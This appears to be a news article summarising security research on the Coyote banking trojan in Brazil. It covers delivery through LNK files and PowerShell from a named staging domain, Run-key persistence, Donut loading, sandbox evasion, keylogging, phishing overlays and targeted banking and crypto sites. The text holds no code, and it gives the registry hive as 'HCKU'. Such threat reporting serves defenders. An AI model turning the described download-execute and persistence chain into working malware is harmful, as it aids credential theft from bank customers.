A new wave of cyber threats is sweeping through Brazil, with the emergence of a banking malware known as Coyote. This malware specifically targets Windows users and can execute various malicious activities, including keylogging, capturing screenshots, and deploying phishing overlays to steal sensitive user credentials.
Delivery Method
Recent analysis by Fortinet’s FortiGuard Labs, conducted by researcher Cara Lin, reveals that attackers deliver Coyote through Windows Shortcut (LNK) file artifacts. These files utilize PowerShell commands to initiate the malware. Kaspersky first documented Coyote in early 2024, noting its focus on South American users and its ability to extract sensitive information from over 70 financial applications.
The infection begins when an LNK file executes a PowerShell command to fetch the next stage of the attack from a remote server, specifically “tbet.geontrigame.’com’.” This command triggers another PowerShell script that launches a loader, which then executes the Coyote payload. The injected code uses Donut, a tool that decrypts and executes final Microsoft Intermediate Language (MSIL) payloads
Establishing Persistence
Once activated, Coyote modifies the Windows registry at ‘HCKU\Software\Microsoft\Windows\CurrentVersion\Run’ to establish persistence. If the malware finds an existing entry, it removes it and creates a new one with a randomly generated name. This entry contains a PowerShell command that downloads and executes a Base64-encoded URL, enabling the core functions of the Coyote banking trojan.
After execution, Coyote gathers essential system information and compiles a list of installed antivirus products on the infected machine. It Base64-encodes this data and sends it to a remote server. The malware also employs various checks to evade detection by sandboxes and virtual environments.
Expanded Target List
A significant update in the latest version of Coyote is its expanded target list, which now includes 1,030 websites and 73 financial institutions. Notable targets include mercadobitcoin.com.br, bitcointrade.com.br, foxbit.com.br, augustoshotel.com.br, blumenhotelboutique.com.br, and fallshotel.com.br.
Malicious Actions
If a victim attempts to access any of the compromised sites, Coyote communicates with an attacker-controlled server to determine the next steps. These steps may involve capturing screenshots or displaying phishing overlays. The malware can also activate a keylogger and manipulate display settings to further compromise the victim’s security.
Conclusion
“Coyote’s infection process is intricate and multi-layered,” Lin stated. “This attack utilizes an LNK file for initial access, leading to the discovery of additional malicious files. The Trojan represents a significant threat to financial cybersecurity, especially given its potential to extend beyond its initial targets.”
